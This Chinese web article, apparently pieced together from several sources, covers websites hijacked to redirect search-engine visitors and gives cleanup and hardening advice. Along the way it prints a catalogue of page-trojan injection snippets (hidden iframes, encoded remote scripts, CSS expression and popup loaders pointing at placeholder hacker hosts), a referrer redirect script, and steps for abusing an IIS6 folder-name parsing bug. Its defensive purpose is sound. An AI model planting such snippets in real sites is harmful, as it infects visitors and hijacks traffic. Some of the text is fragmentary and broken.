。信宜新聞網(wǎng)/訊)關(guān)于“網(wǎng)站直接輸入域名正常進入,用搜索引擎搜索出來的鏈接點擊進入,就直接跳轉(zhuǎn)到其他網(wǎng)址”這個問題,相信很多用別人源碼建網(wǎng)的站長都碰到過,那么要怎么解決呢,這個問題難倒了不少站長,請耐心看完本文。
1.var regexp=/\.(baidu)(\.[a-z0-9\-]+) {1,2}\//ig;var where =document.referrer;if(regexp.test(whe re)){window.location.href=http://www.1xy.cc/bbs/thread-1970252-1-1.html"百度來的訪客 帶到 的地址"}把代碼存到JS文件 然后網(wǎng)站 首頁調(diào)用這個JS文件 就OK了
2.改mdb、改后臺登錄名
3.如果打開圖片不顯示就基本是JS掛馬了
4.把首頁有關(guān)js/gif的文件都用文本打開檢查
5.重點檢查數(shù)據(jù)庫inc.asp、index.asp文件,看看里面是否被修改了數(shù)據(jù)庫鏈接轉(zhuǎn)向,有的黑客把Config.asp備份了一個,只不過備份的Config.asp名字改了,但是inc鏈接的是這個被改了名字的Config.asp。所以從搜索引擎進入就會跳轉(zhuǎn)到別人網(wǎng)站。本人以前也遇到過這樣的事情,后來把網(wǎng)站源碼檢查了一遍才找到這個inc.asp出了問題。
二、.原來的文件即可。 修補漏洞(修補網(wǎng)站漏洞也就是做一下 網(wǎng)站安全。) 1、修改網(wǎng)站后臺的用戶名和密碼及后 臺的默認路徑。 2、更改數(shù)據(jù)庫名,如果是ACCESS數(shù)據(jù) 庫,那文件的擴展名最好不要用mdb, 改成ASP的,文件名也可以多幾個特殊 符號。 3、接著檢查一下網(wǎng)站有沒有注入漏洞 或跨站漏洞,如果有的話就相當打上防 注入或防跨站補丁。 4、檢查一下網(wǎng)站的上傳文件,常見了 有欺騙上傳漏洞,就對相應(yīng)的代碼進行 過濾。 5、盡可能不要暴露網(wǎng)站的后臺地址, 以免被社會工程學(xué)猜解出管理用戶和密 碼。 6、寫入一些防掛馬代碼,讓框架代碼 等掛馬無效。 7、禁用FSO權(quán)限也是一種比較絕的方 法。 8、修改網(wǎng)站部分文件夾的讀寫權(quán)限。 9、如果你是自己的服務(wù)器,那就不僅 要對你的網(wǎng)站程序做一下安全了,而且 要對你的服務(wù)器做一下安全也是很有必 要了! 補充一下:盡量不要下載網(wǎng)上的那一些 免費程序,因為那一些程序中大部分都有后門。
三、如果你是自己寫的代碼,每一行什么含 義、什么作用肯定很清楚,一行一行查 找分析。 如果是別人代寫的,或者是下載的,那 就讓寫的人幫助檢查,或者使用備份文 件覆蓋,或者重新下載一個覆蓋被嵌入 惡意代碼的頁面。 如果這些條件都不具備,試著自己逐行 檢查,看看是否有類似script、iframe 的字符,刪除后檢查還有沒有惡意代碼 嵌入的癥狀(記得做備份),還有要查 看有沒有一串毫無意義的字符比 如“%B6%F1%D2%E2%B4%FA%C2%EB” 表示“惡意代碼”四個字,只是經(jīng)過簡單 加密,正常網(wǎng)頁中不應(yīng)該出現(xiàn)。
四、這個前綴是可以隨意更換的,我 上面取名為"v",例如我可以換成: abc123:expression(this.src='about:b lank',this.outerHTML=''); 掛木馬的家 伙得先看你的CSS里這個前綴,然后掛 馬的時候?qū)懗蛇@樣<iframe style="abc123:expression() !important" src="URL"></iframe>,那 個前綴一定要是和你的網(wǎng)站一樣的 (abc123),才能掛到馬,哈哈哈!如 果把前綴做成動態(tài)的,就非常OK了, 看你怎么掛!
五、知識重點:如何防止網(wǎng)站被掛馬?掛 馬代碼大全 做網(wǎng)站的人知道也不小心 網(wǎng)站就被黑客掛了木馬那個頭痛呀! 首先引起了網(wǎng)友的反感。從些不在上 自己的網(wǎng)站。搜索還懲罰,真是倒霉 呀。下面我們就了解一下,網(wǎng)站是..
六、如何防止網(wǎng)站被掛馬?掛馬代碼大全
做網(wǎng)站的人知道也不小心網(wǎng)站就被黑 客掛了木馬那個頭痛呀!首先引起了 網(wǎng)友的反感。從些不在上自己的網(wǎng) 站。搜索還懲罰,真是倒霉呀。下面 我們就了解一下,網(wǎng)站是如何中 毒的。
1:框架掛馬
<iframe src=地址 width=0 height=0> </iframe>
2:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
3:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt> </script>
muma.txt可改成任意后綴 電腦知識
4:body掛馬
<body ></body>
5:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
6:css中掛馬
body {
background-image: url('javascript:document.write(" <script src=http://www.XXX.net/muma.js></script>")')}
7:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地 址","","toolbar=no,location=no,directo ries=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
8:圖片偽裝
<html>
<iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
9:偽裝調(diào)用:
<frameset rows="444,0" cols="*">
<frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10:高級欺騙
<a href="http://www.163.com(迷惑 連接地址,顯示這個地址指向木馬地 址)" > 頁面要顯示的內(nèi)容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網(wǎng)馬地址";
open(url,"NewWindow","toolbar=no,l ocation=no,directories=no,status=no ,menubar=no,scrollbars=no,resizable =no,copyhistory=yes,width=800,heig ht=600,left=10,top=10");
}
</SCRIPT>
七、如何防止網(wǎng)站被掛馬
A。為什么好好的網(wǎng)站會有木馬?一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有 上傳功能,沒有進行文件目錄和文件 后綴等的判斷,一般這類的目錄, 以“海陽頂端網(wǎng)ASP木馬”較為流行。因2003平臺IIS6原因,也存在目錄名 問題引起ASP木馬。( 微軟的IIS 6存在 嚴重解析文件名錯誤
測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內(nèi)容可以直接 是,然后,用IE遠程訪問這個 hack.jpg,你可以發(fā)現(xiàn),它一樣被當 作是ASP文件來運行!顯然,只要你 的網(wǎng)站程序,允許用戶自己建立文件 夾及上傳圖片,黑客就可以上傳圖片 來當作ASP木馬來運行。
解決辦法:所有使用星外虛擬主機管 理平臺的虛擬主機用戶,可以在主機 面板,設(shè)置執(zhí)行權(quán)限選項中,直接將 有上傳權(quán)限的目錄,取消ASP的運行 權(quán)限,就可以解決這個問題。
大家常用的動易2006和動網(wǎng),BLOG 這類的程序,需要詳細的檢查一下, 并跟著開發(fā)者進行相應(yīng)的安全程序升 級。這樣才能減少因代碼原因引起的
現(xiàn)在最多見的JS掛馬方法有兩種 ,一種是直接將JavaScript腳本代碼 寫在網(wǎng)頁中,當訪問者在瀏覽網(wǎng)頁時 ,惡意的掛馬腳本就會通過用戶的瀏 覽器悄悄地打開網(wǎng)馬窗口,隱藏地運 行。
這種方法使用的關(guān)鍵代碼如下:
window.open("http://www.hack er.com/木馬.html","","toolbar=no,loca tion=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,hei ght=1");
這種代碼往往很長,很容易被安 全工程師發(fā)現(xiàn),而且沒有經(jīng)驗的黑客 也喜歡將“width”和“height=”參數(shù)設(shè)為 “0”,但是設(shè)置為0后,可能會出現(xiàn)惡 意代碼不運行的情況。
另外一種JS掛馬方式是,黑客先 將掛馬腳本代碼“document.write('<If rame src="網(wǎng)頁木馬地址" >
或者
document.write("
")
document.write(" ")
document.write("
")
就成功地將木馬掛到了對方的網(wǎng)頁中了。
小提示:黑客還可以根據(jù)情況隨機變換插入的JS掛馬方法。刪除一段和baidu以及http請求相關(guān)的VB代碼即可!網(wǎng)站中被插入文件了,檢查有無Global.asa 和Global.asax 文件.